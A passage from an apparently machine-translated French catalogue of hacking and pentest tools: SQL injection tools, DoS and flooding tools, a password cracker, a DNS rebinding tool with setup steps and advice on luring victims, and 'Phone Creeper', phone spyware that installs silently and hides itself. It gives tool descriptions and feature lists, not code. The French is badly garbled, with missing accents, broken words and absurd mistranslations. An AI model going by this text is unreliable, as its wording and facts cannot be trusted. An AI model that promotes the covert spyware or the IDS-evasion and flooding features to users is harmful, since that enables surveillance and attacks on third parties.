d'audit qui vous donne la possibilit de choisir la meill eure solution pour vos besoins de scurit de base de donnes. Caractristiques: - Amliore la scurit du systme et assure la transparence du systme. Captures la fois u n accs rgulier et porte arrire pour les systmes de base de donnes vrifies. - Caractristiques de contrle d'audit centralis des systmes de base de donnes multiple s partir d'un emplacement unique de facilit de gestion. - Fonctionnalits de l'interface graphique unifie d'audit, qui rduit la courbe d'app rentissage et est facile utiliser. - Fournit des rapports analytiques qui permettent de rduire de grandes quantits de donnes d'audit des rsums complets permettant ainsi d'identifier facilement les div erses atteintes la scurit de base de donnes. - Fournit des rapports d'analyse qui aident identifier les processus et les util isateurs sont monopolisant les ressources du systme. - Fournit des dtails sur piste de vrification qui ne sont pas disponibles partir u tilitaires natifs d'audit de base de donnes. - Offre la possibilit de gnrer des alertes e-mail en temps rel au personnel cl lorsqu e surviennent des changements des donnes sensibles. - Libre DBA de la ncessit de crer et grer des bases de donnes finement rgl dclenche ins de vrification des donnes de changement. - Prend en charge l'audit des configurations de flexibilit, permettant au personn el de scurit de choisir des types spcifiques d'oprations de base de donnes et les mod ifications de donnes qui doivent tre contrles et enregistres dans la piste d'audit. - Fournit un systme totalement transparent au niveau des donnes et la vrification d u changement de toutes les applications existantes, sans ncessiter de modificatio ns apporter ces demandes. - Compatibilit totale avec tous les htes Exploitation des Systmes sur lesquels les bases de donnes pris en charge peuvent excuter, y compris mais non limit Windows NT , UNIX, Linux, VMS, OS/390, z / OS. ExploitMyUnion http://exploitmyunion.sourceforge.net/ ExploitMyUnion est un outil crit en Python avec une interface utilisateur PyQt fa

it pour automatiser l'exploitation par injection SQL. Havij http://www.itsecteam.com/en/projects/project1.htm Havij est un outil automatis d'injection SQL qui permet aux testeurs de pntration d e trouver et d'exploiter les vulnrabilits d'injection SQL dans une page web. Il peut profiter d'une application web vulnrable. En utilisant ce logiciel l'util isateur peut effectuer des empreintes digitales base de donnes back-end, de rcuprer les utilisateurs de SGBD et les mots de passe, tables de vidage et de colonnes, l'extraction de donnes partir de la base de donnes, l'excution des instructions SQ L et mme l'accs au systme de fichiers sous-jacents et excuter des commandes sur le s ystme d'exploitation. La puissance de Havij qui le rend diffrent des autres outils similaires est de se s mthodes d'injection. Le taux de russite est suprieur 95% injectiong cibles vulnrab les en utilisant Havij. Le convivial GUI (Graphical User Interface) de Havij et les paramtres automatique s et des dtections, il est facile utiliser pour tous, mme des utilisateurs amateur s. Caractristiques: 1. 1. 2. 3. 4. 5. 6. 7. Bases de donnes supportes par des mthodes d'injection: MsSQL 2000/2005 avec l'erreur MsSQL 2000/2005 aucune erreur (union fonde) MySQL (base caisse) MySQL aveugles Erreur MySQL base Oracle (base caisse) MsAccess (union fonde)

2. dtection automatique des bases 3. dtection automatique de type (chane ou un entier) 4. dtection automatique des mots cls (diffrence entre trouver la rponse positive et ngative) 5. Essayer syntaxes d'injection diffrents 6. Support de proxy 7. rsultat en temps rel 8. Options pour remplacer l'espace par /**/,+,... contre les IDS ou les filtres 9. vitez d'utiliser des cordes (magic_quotes similaires contourner les filtres) 10 Suspension de l'union illgale 11 Complet en-ttes HTTP varis (comme referer et agent utilisateur) 12 cookie Charger partir du site pour l'authentification 13 tables de deviner et de colonnes de MySQL 5 <(galement l'aveugle) et MsAccess 14 Fast obtenir des tableaux et des colonnes pour mysql 15 Discussion multi page de recherche d'Admin 16 Discussion multi Online MD5 pirate 17 Mise Informations SGBD 18 Mise en tables, des colonnes et des donnes 19 executation Command (mssql seulement) 20 fichiers systme de lecture (mysql uniquement) 21 INSERT / UPDATE / supprimer des donnes OScanner http://www.cqure.net/wp/oscanner/ Oscanner est un cadre d'valuation Oracle dvelopp en Java. Il a une architecture bas

e de plugins et est livr avec un couple de plugins qui n'ont actuellement: Dnombrement Sid Tests mots de passe (commune et dictionnaire) numrer Oracle version Des rles de comptes numrer numrer les privilges de compte Compte numrer hachages numrer les informations d'audit Les politiques de mot de passe numrer Les liens de base numrer

Les rsultats sont donns dans un arbre java graphique. SFX-SQLI http://www.kachakil.com/papers/sfx-sqli-en.htm SFX-SQLI (Slectionnez Pour XML SQL injection) est une technique d'injection SQL n ouvelle qui permet d'extraire toute l'information d'un Microsoft SQL Server 2005 /2008 base de donnes d'une manire extrmement rapide et efficace. Cette technique est base sur la clause FOR XML, qui est capable de convertir le c ontenu d'un tableau en une chane unique, de sorte que son contenu pourrait tre ajo ut un domaine injection d'une sous-requte dans une entre vulnrables d'une applicatio n web. Safe3 Injecteur SQL http://sourceforge.net/projects/safe3si/ Safe3 SQL Injector est un des outils de tests de pntration le plus puissant qui au tomatise le processus de dtection et d'exploiter des failles d'injection SQL et p rise en charge des serveurs de base de donnes back-end. eci est une liste des fonctions disponibles: * Support complet pour GET / Post / Cookie injection * Prise en charge complte de HTTP de base, Digest, NTLM et authentification de ce rtificats * Support complet de MySQL, Oracle, PostgreSQL, MSSQL, ACESS, DB2, Sybase, Sqlit e * Prise en charge complte de l'erreur / Union / Blind injection / Force SQL * Support pour accs du fichier, la commande excuter, inverse de domaine IP, devine z chemin web, md5 crack, etc * Drivation Super WAF Scrawlr https: / / h30406.www3.hp.com/campaigns/2008/wwcampaign/1-57C4K/index.php Scrawlr, dvelopp par le HP Web Security Research Group, en coordination avec le CS EM, est l'abrviation de SQL Injector et sur chenilles. Scrawlr vont parcourir un site web tout en analysant les paramtres de chaque page Web individuelle pour les vulnrabilits d'injection SQL. Scrawlr est ultra-rapide et utilise notre technolog ie intelligente du moteur de faon dynamique artisanale attaques par injection SQL la vole. Il peut mme fournir la preuve des rsultats positifs en affichant le type de base de donnes principale en cours d'utilisation et une liste de noms de table s disponibles. Toolza http://pentestit.com/2010/03/22/toolza-sql-injection-tool-options/

Toolza - SQL Injection outil avec de nombreuses options Caractristiques de toolza: - LFI / Reader / Loade_file () Bruter - Site de numrisation des dossiers et fichiers - FTP checker - FTP Bruter - Proxy Checker - Proxy Grabber Post/Get/Proxy/SOCKS4-5/Cookies/Timeout/Multithread/HTTPS + autorisation pris en charge - Slectionnez POST ou GET - Support pour le proxy (fichier proxy.txt) - avtocheking, en collaboration avec le premier jour ouvrable - Support pour SOCKS4-5 (fichier socks.txt) - avtocheking, auto-dtection chausset tes type (4-5), sans autorisation, en collaboration avec le premier jour ouvrabl e - Slectionnez une connexion timeout - Capacit insrer les cookies - Possibilit de changer l'agent utilisateur - Possibilit de changer le rfrent - Possibilit de slectionner le protocole HTTP (0 - HTTP/1.0; 1 - HTTP/1.1; par dfau t - 1) bsqlbf http://code.google.com/p/bsqlbf-v2/ Ce script perl permet d'extraire des donnes de Injections SQL aveugles. Il accept e des requtes SQL en tant que paramtre de ligne de commande et il fonctionne la fo is entier et chane base injections. Bases de donnes supportes: 0. MS-SQL 1. MySQL 2. PostgreSQL 3. Oracle L'outil prend en charge 8 modes d'attaque (de type interrupteur): Type 0: Injection SQL aveugles en fonction des conditions vrai et le faux renvoye s par le serveur back-end Type 1: Injection SQL Blind fonde sur l'erreur et vrai (par exemple, erreur de sy ntaxe) renvoyes par le serveur back-end. Type 2: Injection SQL aveugles "ordre" et de "group by". Type 3: extraction de donnes avec les privilges SYS (dbms_export_extension ORACLE exploiter) Type 4: l'excution de code OS (dbms_export_extension ORACLE exploiter) Type 5: est la lecture de fichiers (dbms_export_extension ORACLE exploit, bas sur Java) Type 6: OS est l'excution de code DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC exploiter Type 7: OS est l'excution de code SYS.KUPP $ PROC.CREATE_MASTER_PROCESS (), DBA p

rivs Cmd = revshell-Type 7 prend en charge l'excution de charge utile Meterpreter, excu tez generator.exe premier Type 8: est DBMS_JAVA_TEST.FUNCALL OS excution de code, avec des autorisations d' E / S JAVA Cmd-revshell = Type 8 prend en charge l'excution de charge utile Meterpreter, excu tez generator.exe premier hexjector http://sourceforge.net/projects/hexjector/ Hexjector est un Opensource, multi-plate-forme PHP script pour automatiser site pentest pour SQL Injection vulnrabilits. sqlmap http://sqlmap.sourceforge.net/ sqlmap est un logiciel libre de ligne de commande automatique de l'outil d'injec tion SQL. Son objectif est de dtecter et de tirer parti des vulnrabilits d'injectio n SQL dans les applications web. Une fois qu'il dtecte une ou plusieurs injection s SQL sur la machine cible, l'utilisateur peut choisir parmi une varit d'options p our effectuer une vaste base de donnes back-end de gestion des empreintes digital es du systme, rcuprer des SGBD utilisateur de la session et la base de donnes, les u tilisateurs numrer, les mots de passe, privilges, bases de donnes , vidage utilisate ur spcifi entier ou les tables du SGBD / colonnes, diriger sa propre instruction S QL, lire ou crire du texte ou des fichiers binaires sur le systme de fichiers, d'e xcuter des commandes arbitraires sur le systme d'exploitation, tablir un out-of-ban d connexion "stateful" entre l'agresseur bote et le serveur de base de donnes via stager charge Metasploit, base de donnes d'exploitation enregistres dbordement de t ampon ou de procdure attaque de relais SMB et plus. sqlninja http://sqlninja.sourceforge.net/ qlninja est un outil d'exploiter les vulnrabilits d'injection SQL sur une applicat ion web qui utilise Microsoft SQL Server comme back-end. Son principal objectif est de fournir un accs interactif sur le serveur vulnrable DB, mme dans un environn ement trs hostile.Elle doit tre utilise par les testeurs de pntration d'aider et d'au tomatiser le processus de prise en charge d'un serveur de DB quand une faille d' injection SQL a t dcouvert. Caractristiques D'empreintes digitales * du serveur distant SQL (version, l'utilisateur effectua nt les requtes, les privilges des utilisateurs, la disponibilit xp_cmdshell, mode d 'authentification DB) 'Sa' force brute * du mot de passe (en 2 versions: un dictionnaire et incrmentale s) * Elvation de privilges au groupe sysadmin si le mot de passe 'sa' a t trouv * Cration d'un xp_cmdshell personnalis si l'original a t supprim * Upload de netcat (ou tout autre excutable) en utilisant uniquement les requtes H TTP normales (pas de FTP / TFTP ncessaire) * TCP / UDP scan de la cible SQL Server la machine d'attaque, afin de trouver un port qui est autoris par le pare-feu du rseau cible et l'utiliser pour une coque arrire * Bindshell directe et inverse, la fois TCP et UDP * DNS-tunnel pseudo-shell, en l'absence de ports TCP / UDP sont disponibles pour

un direct / shell inverse, mais le serveur peut rsoudre les noms d'htes DB extern es * Techniques d'vasion pour confondre un peu IDS / IPS / FAT * Intgration avec Metasploit3, pour obtenir un accs graphique sur le serveur dista nt par le biais d'une injection DB serveur VNC Inguma http://code.google.com/p/inguma/ Ngouma est un outil de test de pntration entirement crit en python. Le cadre compren d des modules pour dcouvrir les htes, recueillir des informations sur, les objecti fs de fuzz, brute noms d'utilisateur et mots de passe vigueur et, bien sr, des ex ploits. Bien que les capacits d'exploitation actuels dans Inguma peut tre limite, ce progra mme offre de nombreux outils de collecte d'informations et d'audit cible. Inguma est encore trs dveloppe donc n'oubliez pas de rester jour et vrifier nouveau pour d e nouvelles et mises jour. Mobile (OAT) OCS Outil d'valuation http://voat.sourceforge.net/ OAT est une solution Open Source de scurit outil conu pour vrifier la force du mot d e passe d'utilisateurs de Microsoft Office Communication Server. Aprs un mot de p asse est compromise, OAT dmontre le potentiel des attaques UC qui peuvent tre effe ctues par des utilisateurs lgitimes si les contrles de scurit appropries ne sont pas e n place. NeoPwn http://www.neopwn.com/ Le premier rseau de distribution d'audit pour le tlphone portable sorti. Le NeoPwn Mobile Pentesting projet est fire d'annoncer qu'elle fusionne avec Back Track, pour produire le tout premier BackTrack Mobile suite! Tlphone Creeper http://forum.xda-developers.com/showthread.php?t=527423 Tlphone Creeper est une suite d'espionnage tlphonique, il peut tre install silencieuse ment en insrant une carte SD avec les fichiers ci-dessous ce sujet. Le programme ne se prsente pas au titre des programmes installs ou les programmes en cours et permet un large utiles ou de fonctionnalits. Tlphones excution de ce log iciel peut tre command distance par SMS. Toutes les commandes seront automatiqueme nt reus et supprims immdiatement et les rsultats seront publis l'expditeur. Pr-configur les paramtres peuvent tre ajouts l'installateur d'avoir votre mot de pass e par dfaut et votre numro de tlphone pour recevoir des mises jour en direct. Par dfa ut, ce programme en mode silencieux se rinstaller, mme aprs une rinitialisation matri elle, si la carte mmoire avec ces fichiers est encore dans le dispositif. " Polyvalent FireCat http://sourceforge.net/projects/firecatpackage/ FireCat (Catalogue de l'extension Firefox de vrification) est une collection mind map des extensions firefox le plus efficace et utile d'audit de scurit axe sur l'ap plication et l'valuation. FireCat n'est pas un replacement des utilitaires de scur

it et d'autres logiciels, ainsi que fuzzers, les mandataires et les vulnrabilits de s applications scanners. PeachFuzzer http://peachfuzzer.com/ Peach est une SmartFuzzer qui est capable de raliser la production et le fuzzing mutation base. Peach ncessite la cration de fichiers Peachpit qui dfinissent la structure, des inf ormations de type, et les relations dans les donnes fuzzed. Il permet en outre de la configuration d'une course fuzzing, y compris la slection d'un transport de d onnes (Editeur), l'exploitation forestire interface, etc http://peachfuzzer.com/PeachQuickstart Scapy https: / / www.secdev.org/projects/scapy/ Scapy est un puissant outil interactif de manipulation de paquets, gnrateur de paq uet, scanner rseau, outil de dcouverte du rseau, et renifleur de paquets. Il fourni t les classes pour la cration interactive de paquets ou des ensembles de paquets, de les manipuler, de les envoyer sur le fil, sniff autres paquets de fil, faire correspondre les rponses et les rponses, et plus encore.L'interaction est fourni par l'interprteur Python, donc les structures de programmation Python peuvent tre utiliss (tels que les variables, les boucles et les fonctions). Rapport modules s ont possibles et faciles faire. Il est destin faire les mmes choses que ttlscan, n map, hping, queso, p0f, xprobe, arping, arp-sk, arpspoof, Firewalk, irpas, tethe real, tcpdump, etc SpiderLab Outils https: / / www.trustwave.com / SpiderLabs-tools.php SpiderLabs a dvelopp des dizaines d'outils au fil des ans. La plupart d'entre eux finissent comme des outils internes que depuis ils ont fini par faire leur chemi n dans l'une des offres de produits de Trustwave. hping http://www.hping.org/ hping est une ligne de commande oriente TCP / assembleur de paquets IP / analyseu r. L'interface est inspire la commande ping (8) commande unix, mais hping est non seulement capable d'envoyer des demandes d'cho ICMP. Il supporte le protocole TC P, UDP, ICMP et IP-RAW, a un mode de traceroute, la capacit d'envoyer des fichier s entre un canal couvert, et de nombreuses autres fonctionnalits. Bien que hping a t principalement utilis comme un outil de scurit dans le pass, il peu t tre utilis de plusieurs faons par des gens qui ne se soucient pas de scurit pour te ster les rseaux et les htes. Un sous-ensemble des choses que vous pouvez faire en utilisant hping: * Les preuves de pare-feu * Port avanc de numrisation * Pour tester un rseau, en utilisant des protocoles diffrents, TOS, la fragmentati on * Manuel dcouverte MTU du chemin * Advanced traceroute, sous tous les protocoles pris en charge * Distance OS fingerprinting disponibilit distance * deviner * TCP / IP de vrification des piles

hping * peut aussi tre utile aux tudiants qui apprennent le protocole TCP / IP. pentbox http://www.pentbox.net/ PenTBox est une suite de scurit qui emballe beaucoup de scurit et la stabilit des tes ts des programmes axs sur des rseaux et des systmes. Par exemple, la suite a Honeypot, TCP Flood Dni de Service outils de test, Secure Instant Messaging, Port Scanner, Fuzzer, mots de passe scuris gnrateur et plus. Tous les programmes sont en cours d'laboration par PenTBox quipe et les contribute urs de la communaut du logiciel libre au projet. Programm en Ruby, et oriente vers les systmes GNU / Linux (mais compatible avec Win dows, MacOS et plus). Il est libre, sous licence GNU/GPLv3. Rseau 6tunnel http://toxygen.net/6tunnel/ 6tunnel vous permet d'utiliser les services fournis par les htes IPv6 avec des ap plications IPv4 et vice-versa. Il peut se lier n'importe lequel de vos IPv4 (par dfaut) ou des adresses IPv6 et de transmettre toutes les donnes pour IPv4 ou IPv6 (par dfaut) d'accueil. DDOSIM http://sourceforge.net/projects/ddosim/ Couche application DDoS Simulator ddosim est un outil qui peut tre utilis dans un environnement de laboratoire pour simuler un dni de service distribu (DDOS) contre un serveur cible. Le test montre la capacit du serveur pour grer les applications spcifiques des attaques DDOS. ddos im simule plusieurs htes zombie (ayant des adresses IP alatoires) qui crent plein l es connexions TCP vers le serveur cible. Aprs avoir termin la connexion, ddosim co mmence la conversation avec l'application d'coute (par exemple, le serveur HTTP). ddosim est crit en C + + et fonctionne sur Linux. Ses fonctionnalits actuelles com prennent: * DDoS HTTP avec des demandes valides * DDoS HTTP de requtes non valides (semblable un DC + + attaque) * SMTP DDoS inondations * connexion TCP sur le port alatoire Echo Mirage http://www.bindshell.net/tools/echomirage Echo Mirage est un proxy rseau gnrique. Il utilise l'injection de DLL et techniques des fonctions d'accrochage pour rediriger les appels de fonction rseau connexes afin que les donnes transmises et reues par des applications locales peuvent tre ob serves et modifis. fonctions de chiffrement Windows et OpenSSL sont galement accrochs de telle sorte que le texte brut de donnes envoyes et reues au cours d'une session crypte est galeme nt disponible. Le trafic peut tre intercept en temps rel, ou manipuls avec des expressions rgulires e t des scripts d'action

Cannon ions de basse orbite http://sourceforge.net/projects/loic/ Orbite basse Ion Cannon (Loc) est un programme open source crit en McDonald's Visu al C # environnement de codage. Il est utilis pour DDoSing sites Web et les tests de scurit du serveur. LOIC (orbite basse Ion Cannon) est une application de test de rseau stress, crit e n C # et dvelopp par "praetox". Il tente une attaque par dni de service sur le site cible par les inondations le serveur avec des paquets TCP, les paquets UDP, ou des demandes HTTP avec l'intention de perturber le service d'un hte particulier. Le programme a t exploite au cours du projet Chanology attaquer des sites Web de Sc ientologie, et est actuellement utilis par l'opration Avenge Assange (organise par l'opration de rcupration) pour attaquer les sites Internet des entreprises et des o rganisations qui se sont opposs Wikileaks http://insurgen.info/wiki/Low_Orbit_Ion_Cannon http://www.partyvan.info/wiki/Low_Orbit_Ion_Cannon Mausezahn http://www.perihel.at/sec/mz/ Mausezahn est un gnrateur de trafic rapide gratuit crit en C qui vous permet d'envo yer presque tous les paquets possibles et impossibles. Il est principalement uti lis pour tester les rseaux VoIP ou multicast, mais aussi pour des audits de scurit p our vrifier si vos systmes sont durcies suffisant pour des attaques spcifiques. Mausezahn peut tre utilis par exemple: * Comme gnrateur de trafic (par exemple, souligner les rseaux multicast) * Pour mesurer prcisment la gigue (variations de retard) entre deux htes (par exemp le la vrification VoIP-SLA) * Comme outil didactique lors d'une confrence de transmission de donnes ou pour ex ercices pratiques * Pour les tests de pntration de firewalls et les IDS * Pour les attaques DoS sur les rseaux (aux fins de vrification bien sr) * Pour trouver des bogues dans le logiciel de rseau ou les appareils * Pour les attaques de reconnaissance l'aide de balayages ping et les scans de p orts * Pour tester le comportement du rseau dans des circonstances tranges (stress test , paquets malforms, ...) ... Et plus encore. Mausezahn est fondamentalement un outil polyvalent paquet cra tion sur la ligne de commande avec une syntaxe simple et une aide contextuelle. Il pourrait galement tre utilis dans (bash-) des scripts pour effectuer une combina ison de tests. Soit dit en passant, Mausezahn est assez rapide, quand a commenc s ur mon vieux PIII-portable (1,4 GHz, Gigabit Ethernet), j'ai mesur 755 Mbit / s e n utilisant les compteurs de paquets d'une interface HP ProCurve 5400 commutateu r. Naptha http://netexpect.org/wiki/Naptha TCP tat Epuisement d'essai Avec Network Attendez - Les vulnrabilits Naptha sont un type de vulnrabilits de dni de service et documents par Bob Keyes, de l'quipe BindVie w rasoir de scurit en 2000. Les vulnrabilits existent dans certaines implmentations d u protocole TCP, en particulier dans la faon dont certaines implmentations TCP gar der une trace de l'tat des connexions TCP, et permettre un attaquant d'puiser les ressources d'un systme attaqu sans utiliser beaucoup de ressources sur le systme ut ilis pour lancer l'attaque.

OpenDPI http://code.google.com/p/opendpi/ Le moteur OpenDPI, publi sous la licence LGPL, diffre de commerciaux ipoque de mot eur d'analyse dans son matriel DPI prix lev. La version open-source est beaucoup pl us lent et (plus important) ne rvle pas de mthodes pour identifier ipoque transmiss ions cryptes. DPI vendeurs prtendent tous niveaux levs de succs identifier ce trafic sur la base des modles d'coulement et les signatures poigne de main des protocoles communs tels que BitTorrent et Skype, mme si elles ne peuvent pas casser le crypt age et d'examiner le contenu de ces transmissions. Pylore http://motomastyle.com/pyloris/ Pylore est un outil pour tester la vulnrabilit d'un serveur Web une classe particu lire de dni de service (DoS). Il utilise la mthode Slowloris; en utilisant toutes l es connexions disponibles, les serveurs Web ne peut pas traiter les demandes val ables. Pylore est un outil de script pour tester la vulnrabilit d'un serveur Web un dni de service (DoS) qui supporte SOCKS, SSL, et toutes les mthodes de requte HTTP. Il u tilise la mthode Slowloris. QuickRecon http://code.google.com/p/quickrecon/ QuickRecon est un outil d'information simple rassemblement qui vous permet de: * Sous-domaines Bruteforce d'un domaine cible * Effectuer le transfert de zone * Les adresses email Recueillir de Google.com et Bing.com * Trouver les relations humaines en utilisant XHTML Friends Network (microformat s) RawCap http://www.netresec.com/?page=RawCap RawCap est un renifleur de commande en ligne gratuit de rseau pour Windows qui ut ilise des sockets bruts. Proprits de RawCap: Peut sniff toute interface qui a obtenu une adresse IP, y compris 127.0.0.1 (loc alhost / loopback) RawCap.exe est seulement 17 kB Aucune bibliothque externe ou DLL ncessaires autres que. NET Framework 2.0 Aucune installation n'est ncessaire, il suffit de tlcharger et RawCap.exe sniff Peut sniff la plupart des types d'interface, y compris les interfaces WiFi et PP P le minimum de mmoire et de la charge CPU Fiable et simple d'utilisation Utilisation Vous devez disposer de privilges d'administrateur pour excuter RawCap. Relier http://code.google.com/p/rebind/ Relier est un outil de DNS reconsolidation, qui implmente les multiples attaques

"A" DNS record reconsolidation. Il vous permet un accs interne d'un routeur cible interface Web! La meilleure partie est l'administration distance n'a pas besoin d'tre activ pour que cette attaque fonctionne! Tout ce qui est ncessaire est que l 'utilisateur l'intrieur du rseau cible surfer sur un site Web qui est contrle, ou a t compromise, par vous. Vous pouvez ventuellement utiliser des astuces d'ingnierie s ociale pour inciter un utilisateur visiter ce site web. Il ne ncessite aucune con naissance pralable du routeur cible ou les paramtres de configuration du routeur c omme marque, le modle, l'adresse IP, nom d'hte, etc, et ne pas utiliser un anti-DN S pinning techniques. Relier intgre un serveur DNS, deux serveurs Web et un serve ur proxy HTTP dans un seul binaire Linux. DNS reliaison Maintenant, comment voulez-vous le faire fonctionner. Dans les mots des auteurs "En fait, vous devez configurer votre nom de domaine utiliser Rebind que votre s erveur DNS primaire. Cela se fait en deux tapes: d'abord, vous devez vous enregis trer la machine que vous avez l'intention d'excuter des Rebind comme un serveur d e noms, alors vous devez configurer votre domaine pour utiliser ce serveur de no m.La plupart des bureaux d'enregistrement vous permettra d'effectuer ces deux ac tions, bien que certains ne sont pas et de nombreux, il est difficile de trouver ces paramtres, de sorte que vous pourriez avoir chercher un peu. Aller la registraire, o vous avez enregistr votre nom de domaine (Host-Unlimited, GoDaddy, Yahoo, etc) et le premier enregistrement de deux serveurs de noms. Vous souhaitez vous inscrire deux parce que la plupart des bureaux d'enregistrement aura besoin de votre domaine d'avoir au moins deux serveurs de noms, et que vous voulez relier traiter toutes les requtes DNS. Nom du serveur de noms ns1 et ns2 et dfinir leurs adresses IP celle de la machine d'o vous avez l'intention d'excuter Rebind. Une fois que vous avez enregistr votre nom de serveur, allez faire vos paramtres D NS de domaine et de dfinir ces serveurs de noms que les serveurs de noms faisant autorit pour votre domaine. Si par exemple votre domaine est "mydomain.com", vous entrez dans ns1.mydomain.com et ns2.mydomain.com. Maintenant, tout le trafic DN S seront dirigs vers la machine o vous avez l'intention d'excuter Rebind, ce qui pe rmettra Rebind accepter et traiter toutes les demandes DNS pour votre domaine. " Relier a t spcialement programm pour fonctionner uniquement avec les systmes d'exploi tation Linux. Ainsi, il pourrait fonctionner sur BSD, mais pas sur Windows. Il t ravaillera galement sur les systmes d'exploitation 64-bit. Seuls les pr-requis est que, il doit tre excut en tant que root, et vous devez avoir install iptables et lis ts dans $ PATH. Il a toutes les images filtres. Il ne fonctionnera pas avec IPv6 s oit. Considrant que nous avons une autre anne pour IPv6 d'tre populaire, nous pourr ions tout aussi bien jouer avec elle pour l'instant! Rappelez-vous! Vous devez avoir le http://your-domain-name/init visite de l'util isateur final et non pas seulement http://your-domain-name/. (En fait, nous sont demands ce sujet!) SSL NetCat Capable http://gomor.org/bin/view/GomorOrg/SslNetcat Vous savez tous ce qui est netcat (crit par Hobbit en 1996), comment l'utiliser e t qu'il aurait d tre intgre dans tous les systmes UNIX il ya longtemps. netcat manqua it certaines fonctionnalits, et j'ai essay de les ajouter dans cette version de Pe rl. Par exemple, le support de SSL, TCP et UDP mandatement et IPv4/IPv6 fonction nalits de proxy. C'est dsormais chose faite, moins que j'ai rat un bug. Maintenant, profitez.

ShareScan http://www.mcafee.com/us/downloads/free-tools/sharescan.aspx ShareScan est un utilitaire gratuit qui permet au personnel informatique de scuri t pour identifier ouvrir des partages de fichiers Windows disponibles sur le rseau interne. Cet outil peut aider les administrateurs identifier les systmes qui ont de larges autorisations ouvert ou aucune autorisation - des vulnrabilits potentie lles qui devraient tre assainis. Slowloris http://ha.ckers.org/slowloris/ DoS HTTP Slowloris T50 Sukhoi PAK FA http://www.4shared.com/dir/wlw1Gawh/NB_Research_Labs.html T50 Sukhoi PAK FA mixte Packet injecteur (alias F22 Raptor) est un outil conu pou r effectuer des tests de stress. Il est un puissant et un outil paquet unique in jection, qui est capable de: * Envoyez squentielle (c.--peu prs, sur le mme temps) les protocoles suivants: 1. 2. 3. 4. ICMP - Internet Control Message Protocol IGMP - Protocole de gestion de groupe Internet TCP - Transmission Control Protocol UDP - User Datagram Protocol

* Envoyer un montant (trs) incroyable de paquets par seconde, ce qui en fait un se cond to none" outil: 1. Plus de 1.000.000 de pourcentage du SYN Flood (+60% de la liaison montante du rseau) dans un rseau 1000BASE-T (Gigabit Ethernet). 2. Plus de 120.000 pps de SYN Flood (+60% de la liaison montante du rseau) dans u n rseau 100BASE-TX (Fast Ethernet). * Effectuer des "stress tests" sur une varit d'infrastructures de rseau, les priphriq ues rseau et de solutions de scurit en place. * Simulation d'attaques par dni de service-, la validation des rgles de pare-feu e t Intrusion Detection System / Intrusion Prevention System politiques. Wont dire beaucoup de choses ce sujet - il suffit de tlcharger et de voir par vous -mme la puissance de cet outil. Oh! Avons-nous oubli de vous dire que c'est un out il open source, programm en C? THC-IPV6 http://freeworld.thc.org/thc-ipv6/ Un jeu d'outils complet pour attaquer les faiblesses inhrentes du protocole IPV6 et ICMP6, et comprend un facile d'employer la bibliothque de l'usine de paquets. S'il vous plat note pour obtenir un accs complet tous les outils disponibles vous avez besoin de dvelopper des outils IPV6 vous-mme ou proposer des correctifs, des outils et des commentaires au THC-ipv6 projet. UDP Unicorn http://sourceforge.net/projects/udpunicorn/ Une inondation Win32 UDP / DoS (Denial of Service) d'utilit avec le multithreadin g. la bibliothque Winsock utilise pour crer des sockets UDP et l'inondation d'une cible. Pour les tests de scurit rseau.

Yersinia http://www.yersinia.net/ Yersinia est un outil de rseau conu pour tirer parti de certaines weakeness dans l es protocoles rseau diffrents. Il prtend tre un cadre solide pour analyser et tester les rseaux et les systmes dploys. Actuellement, il existe certains protocoles rseau mis en uvre, mais d'autres sont venir (nous dire lequel est votre prfr). Les attaques pour les protocoles rseau suiv ants sont mis en uvre (mais bien sr vous tes libre de mise en uvre de nouvelles): * * * * * * * * * Protocole Spanning Tree (STP) Cisco Discovery Protocol (CDP) Protocole Trunking dynamique (DTC) Dynamic Host Configuration Protocol (DHCP) Hot Standby Router Protocol (HSRP) IEEE 802.1Q IEEE 802.1X Protocole Inter-Switch Link (ISL) VLAN Trunking Protocol (VTP)

hotfuzz http://hotfuzz.atteq.com/ HotFuzzThe HotFuzz projet vise fournir un outil pour dcouvrir les failles de scuri t dans les applications rseau. A la base est le cadre de fuzzing Peach. Pour HotFu zz comprendre les protocoles existants, dissecteurs Wireshark sont utiliss. Il me t en uvre une fonctionnalit de proxy entre les applications rseau. Il modifie les d onnes avant de les transmettre au programme fuzzed. En oprant comme un proxy rseau entre l'application client et le serveur et effectue en temps rel l'analyse des d onnes et de fuzzing. Nous savons tous que Peach est capable d'effectuer deux muta tion fuzzing base et la production de base. Ainsi, nous pouvons sans risque dire que HotFuzz est galement capable de la mme chose. Cration d'un fichier fosse. Peut tre trs difficile pour les utilisateurs inexpriments . C'est l que HotFuzz est trs pratique car il ncessite trs peu de connaissances sur l'application. Enfait il est si facile, qu'il prend les quatre tapes suivantes po ur fuzz d'une application * * * * Configuration des applications et la partie proxy HotFuzz Enregistrement Configuration du processus de fuzzing Fuzzing

hydre http://freeworld.thc.org/thc-hydra/ Un biscuit sal du rseau trs rapide d'ouverture de session qui supporter de nombreux services Numro un des trous de scurit sont plus des mots de passe, comme le montre le mot de passe toutes les tudes de scurit. Hydra est un pirate connexion parallized qui supporte de nombreux protocoles d'a ttaquer. Les nouveaux modules sont faciles ajouter, ct de cela, il est souple et trs rapide. Actuellement cet outil prend en charge: TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL, REXEC, Rsh, rlogin, CVS, SNMP, SMTP-AUTH, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS,

ICQ, SAP/R3, ldap2, normalis LDAP3, Postgres, Teamspeak, auth Cisco, Cisco permet tent, AFP, ldap2, Cisco AAA (incorpore dans le module telnet). Cet outil est un code preuve de concept, de donner aux chercheurs et la scurit consultants la possibilit de prsenter la faon dont il serait facile d'accder sans au torisation l'accs distance partir d'un systme. hyenae http://sourceforge.net/projects/hyenae/ Hyenae est une plateforme trs flexible indpendante gnrateur de paquets rseau. Il vous permet de reproduire plusieurs MITM, DoS et DDoS scnarios d'attaque, est livr ave c un dmon en cluster distance et un assistant interactif attaque. Caractristiques * Inondations ARP-Request * Empoisonnement ARP Cache* Inondations PPPoE d'initiation de session * Cessation Blind session PPPoE * Inondations ICMP Echo* Attaque ICMP-Schtroumpf * ICMP base TCP-Connection reset * Inondations TCP SYN* Attaque TCP-Land * Blind TCP-Connection reset * Inondations UDP * Inondations DNS-Query * Inondations DHCP Dcouvrez * Attaque la famine DHCP * DHCP Release forcer * Cisco HSRP routeur actif dtournement * Le modle de configuration bas sur l'adresse de paquets * Adresse intelligente et de dtection de protocole adresse * Randomisation Smart gnrique base de * Dmon pour la mise en place des rseaux d'attaque distance icmpsh https: / / github.com / inquisb / icmpsh 